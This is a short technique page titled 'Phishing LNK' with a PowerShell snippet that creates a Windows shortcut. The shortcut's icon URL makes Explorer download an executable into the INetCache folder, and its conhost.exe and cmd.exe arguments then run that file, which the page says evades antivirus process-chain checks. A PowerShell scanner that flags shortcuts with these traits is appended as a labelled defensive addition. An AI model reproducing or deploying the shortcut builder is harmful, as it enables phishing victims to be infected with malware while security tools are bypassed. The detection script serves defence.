Phishing LNK

$shell = New-Object -ComObject WScript.Shell;
$desktop = [System.Environment]::GetFolderPath('Desktop');
$shortcut = $shell.CreateShortcut("$desktop\qwqdanchun.lnk");
$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
$shortcut.WindowStyle = 7;
$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B qwqdanchun*.exe | cmd.exe /k';
$shortcut.IconLocation = "https://127.0.0.1/qwqdanchun.exe?.ico";
$shortcut.Save();

This uses the icon cache to download the file, and uses conhost to bypass the AV's judgement of the process chain. (Only applies to Win10; the cache directory differs on Win7 and others, so write your own if you are interested.)
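As a defensive counterpart, added here and not part of the original page, the following PowerShell scan flags .lnk files that show the traits used above: an IconLocation pointing at a remote URL, conhost.exe used to launch cmd.exe, and arguments that reach into INetCache. The script's structure and default path are my own choice.

```powershell
# Added example (not from the original page): scan a folder for .lnk files whose
# icon is fetched from a remote URL or whose arguments chain through cmd.exe into
# the INetCache directory, the traits of the shortcut built above.
param(
    [string]$Path = [System.Environment]::GetFolderPath('Desktop')
)

$shell = New-Object -ComObject WScript.Shell

Get-ChildItem -Path $Path -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
    # CreateShortcut on an existing .lnk opens it and exposes its stored properties
    $lnk = $shell.CreateShortcut($_.FullName)
    $reasons = @()

    # Trait 1: IconLocation pointing at http/https. Explorer fetches the icon when the
    # shortcut is rendered, so the download happens before anyone clicks it.
    if ($lnk.IconLocation -match '^https?://') {
        $reasons += "remote icon: $($lnk.IconLocation)"
    }

    # Trait 2: a benign-looking target (conhost.exe) whose arguments spawn cmd.exe,
    # which hides cmd.exe's real parent from simple parent/child process rules
    if ($lnk.TargetPath -match '\\conhost\.exe$' -and $lnk.Arguments -match 'cmd\.exe') {
        $reasons += "conhost launching cmd: $($lnk.Arguments)"
    }

    # Trait 3: arguments that search or execute from the browser cache directory
    if ($lnk.Arguments -match 'INetCache') {
        $reasons += "references INetCache"
    }

    # Trait 4: WindowStyle 7 (minimised) together with any trait above
    if ($lnk.WindowStyle -eq 7 -and $reasons.Count -gt 0) {
        $reasons += "minimised window"
    }

    if ($reasons.Count -gt 0) {
        [PSCustomObject]@{
            File    = $_.FullName
            Target  = $lnk.TargetPath
            Reasons = ($reasons -join '; ')
        }
    }
}
```

Run it against user-writable locations such as Desktop, Downloads and Startup folders; a hit on trait 1 alone is worth triage, since a remote icon has no legitimate use in a local shortcut.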

Reference articles:
